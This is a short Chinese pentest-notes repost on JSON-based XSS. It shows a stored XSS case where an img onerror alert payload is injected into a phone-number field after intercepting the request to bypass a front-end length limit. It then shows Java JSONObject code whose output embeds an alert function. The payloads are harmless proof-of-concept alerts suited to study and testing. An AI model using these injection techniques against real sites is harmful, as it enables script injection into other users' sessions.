JSON XSS

本文转载自查看原文 2018-11-08 16:09 1872 渗透测试

漏洞实例一：

1、在更新用户信息，修改联系电话，抓包绕过前端20个字符限制，Payload为 111<img src=1 onerror=alert(1)>

2、更新后，访问json

3、已隐去相关信息，json形式大约是这样子：

{"birthday":"1991-12-09 00:00:00","org": {"parent":"ae5ef78d-bd21-4e10-a03a-2707366dfb80", "phone":"111<img src=1 onerror=alert(1)>","createTime":"2019-01-25 09:46:30","status":1}

4、在页面找到输出点，成功弹窗。

案例二：

json = new JSONObject(); json.put("code", 200); json.put("info", "{'replace':function(){alert(/xss/);}}"); json.put("msg", "success"); System.out.println(json); // 输出：{"code":200,"info":{"replace":function(){ alert(/xss/); }},"msg":"success"}

参考链接：https://blog.csdn.net/l_f0rm4t3d/article/details/23851071/

免责声明！

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 XSS xss 什么是XSS？【快学SpringBoot】过滤XSS脚本攻击(包括json格式) JSONP 安全攻防技术（JSON劫持、 XSS漏洞） JSONP 安全攻防技术（JSON劫持、 XSS漏洞） flask的安全注意事项，如何防范XSS、CSRF、JSON安全 XSS注入 XSS靶机 XSS挑战